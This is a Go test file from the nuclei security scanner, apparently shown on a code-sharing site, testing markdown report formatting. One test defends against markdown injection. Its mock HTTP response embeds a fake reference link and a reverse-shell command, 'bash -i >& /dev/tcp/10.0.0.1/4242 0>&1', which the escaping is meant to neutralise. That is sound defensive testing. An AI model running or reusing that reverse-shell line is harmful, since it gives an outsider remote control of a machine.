Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
projectdiscovery
GitHub Repository: projectdiscovery/nuclei
 Path: blob/dev/pkg/reporting/format/format_utils_test.go
2070 views
1
package format

2


3
import (

4
	"fmt"

5
	"strings"

6
	"testing"

7


8
	"github.com/projectdiscovery/nuclei/v3/pkg/model"

9
	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/severity"

10
	"github.com/projectdiscovery/nuclei/v3/pkg/model/types/stringslice"

11
	"github.com/projectdiscovery/nuclei/v3/pkg/output"

12
	"github.com/projectdiscovery/nuclei/v3/pkg/reporting/exporters/markdown/util"

13
	"github.com/stretchr/testify/require"

14
)

15


16
func TestToMarkdownTableString(t *testing.T) {

17
	info := model.Info{

18
		Name:           "Test Template Name",

19
		Authors:        stringslice.StringSlice{Value: []string{"forgedhallpass", "ice3man"}},

20
		Description:    "Test description",

21
		SeverityHolder: severity.Holder{Severity: severity.High},

22
		Tags:           stringslice.StringSlice{Value: []string{"cve", "misc"}},

23
		Reference:      stringslice.NewRawStringSlice("reference1"),

24
		Metadata: map[string]interface{}{

25
			"customDynamicKey1": "customDynamicValue1",

26
			"customDynamicKey2": "customDynamicValue2",

27
		},

28
	}

29


30
	result := CreateTemplateInfoTable(&info, &util.MarkdownFormatter{})

31


32
	expectedOrderedAttributes := `| Key | Value |

33
| --- | --- |

34
| Name | Test Template Name |

35
| Authors | forgedhallpass, ice3man |

36
| Tags | cve, misc |

37
| Severity | high |

38
| Description | Test description |`

39


40
	expectedDynamicAttributes := []string{

41
		"| customDynamicKey1 | customDynamicValue1 |",

42
		"| customDynamicKey2 | customDynamicValue2 |",

43
		"", // the expected result ends in a new line (\n)

44
	}

45


46
	actualAttributeSlice := strings.Split(result, "\n")

47
	dynamicAttributeIndex := len(actualAttributeSlice) - len(expectedDynamicAttributes)

48
	require.Equal(t, strings.Split(expectedOrderedAttributes, "\n"), actualAttributeSlice[:dynamicAttributeIndex]) // the first part of the result is ordered

49
	require.ElementsMatch(t, expectedDynamicAttributes, actualAttributeSlice[dynamicAttributeIndex:])              // dynamic parameters are not ordered

50
}

51


52
func TestCreateReportDescription_MarkdownInjection(t *testing.T) {

53
	// Setup a mock result event with malicious payload in various fields

54
	event := &output.ResultEvent{

55
		TemplateID: "test-template",

56
		Host:       "example.com",

57
		Matched:    "https://example.com/vulnerable",

58
		Type:       "http",

59
		Info: model.Info{

60
			Name:           "Test Template",

61
			Authors:        stringslice.StringSlice{Value: []string{"researcher"}},

62
			SeverityHolder: severity.Holder{Severity: severity.High},

63
			Tags:           stringslice.StringSlice{Value: []string{"test"}},

64
		},

65
		Request:     "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n",

66
		Response:    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>Hello, world\r\n\r\n```\r\n\r\nReferences:\r\n- https://rce.ee/pwned\r\n\r\n**CURL command**\r\n```sh\r\nbash -i >& /dev/tcp/10.0.0.1/4242 0>&1\r\n```\r\n</body></html>",

67
		CURLCommand: "curl -X GET https://example.com",

68
	}

69


70
	result := CreateReportDescription(event, &util.MarkdownFormatter{}, false)

71
	fmt.Println(result)

72


73
	require.NotContains(t, result, "```\r\n\r\nReferences:\r\n- https://rce.ee/pwned")

74
	require.NotContains(t, result, "```sh\r\nbash -i >& /dev/tcp")

75
}

76


77